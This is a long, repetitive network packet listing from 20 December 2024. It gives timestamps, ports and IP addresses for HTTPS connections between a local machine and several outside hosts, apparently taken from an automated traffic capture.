                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.810602903 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.822455883 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.823760986 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.823771000 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.834002972 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.834044933 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.834053040 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.845685005 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.845726013 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.845733881 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.857604980 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.857652903 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.857662916 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.869193077 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.869235992 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.869245052 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.879740953 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.879784107 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.879792929 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.889421940 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.889478922 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.889487028 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.899446964 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.899501085 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.899508953 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.910984993 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.911056995 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.911065102 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.918754101 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.918801069 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.918812990 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.927804947 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.927851915 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.927860022 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.938241005 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.938288927 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.938297987 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.946233034 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.946276903 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.946285963 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.958081961 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.958127975 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.958141088 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.964975119 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.965018988 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.965029001 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.973632097 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.973731041 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.973742962 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.980880022 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.980937958 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.980946064 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.989483118 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.989623070 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.989630938 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.999285936 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.999356985 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:20.999366045 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.001275063 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.001315117 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.001322031 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.006268978 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.006325006 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.006334066 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.011745930 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.011789083 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.011796951 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.017152071 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.017196894 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.017205954 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.022546053 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.022588968 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.022597075 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.027981043 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.028023958 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.028032064 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.033448935 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.033489943 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.033498049 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038750887 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038801908 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038805962 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038820028 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.038851976 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.044095993 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045140028 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045187950 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045530081 CET49765443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.045547009 CET44349765172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.248153925 CET44349778173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.248241901 CET49778443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899185896 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899243116 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.899698019 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.906817913 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:21.906862020 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053642035 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053680897 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.053745031 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.054536104 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.054548979 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561062098 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561098099 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561165094 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561516047 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.561526060 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.597647905 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602221012 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602257967 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.602624893 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.603425026 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.603488922 CET44349788172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:23.658148050 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793397903 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793448925 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.793505907 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.794421911 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.794439077 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.881037951 CET49788443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.958980083 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959036112 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959498882 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.959511042 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.969197035 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.969218969 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.270040035 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.270102978 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272612095 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272634029 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.272918940 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274450064 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274507999 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274518013 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.274643898 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.319336891 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817071915 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817661047 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.817720890 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818120003 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818145990 CET4434979620.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.818157911 CET49796443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002779961 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002872944 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002935886 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002975941 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.002995968 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.003017902 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.005153894 CET49799443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.005184889 CET44349799116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.201668978 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.201739073 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.202250004 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.202256918 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204035997 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204041958 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204113007 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204123974 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204130888 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204137087 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204169989 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204176903 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204241991 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204256058 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204269886 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204281092 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204292059 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204298973 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204372883 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204387903 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204427958 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204489946 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204514027 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204538107 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204639912 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204663038 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204680920 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204690933 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204705954 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204718113 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204813004 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204827070 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204835892 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204845905 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204864025 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204864025 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.204962969 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.802289963 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.802321911 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.802386999 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.802783012 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:26.802797079 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085529089 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085628033 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085644007 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085706949 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085737944 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.085891962 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.086680889 CET49805443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.086694956 CET44349805116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.270287991 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.270401001 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.270900965 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.270914078 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272597075 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272600889 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272677898 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272687912 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272706032 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272710085 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272768974 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272782087 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272788048 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272793055 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272855043 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:28.272866964 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.005400896 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.005507946 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.005590916 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.005964994 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.005994081 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.707981110 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.708046913 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.708059072 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.708105087 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.708144903 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.708184958 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.709016085 CET49813443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:29.709028006 CET44349813116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.016047001 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.016078949 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.016129017 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.016408920 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.016426086 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.406692028 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.406769991 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.407246113 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.407274008 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409168959 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409182072 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409260035 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409298897 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409312010 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409324884 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409461021 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409502029 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409651995 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409694910 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409904957 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409934044 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409961939 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.409975052 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.410033941 CET49820443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:30.410053968 CET44349820116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.413050890 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.413383007 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.415333986 CET49823443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.415344954 CET44349823116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:31.417785883 CET49823443192.168.2.6116.203.12.114
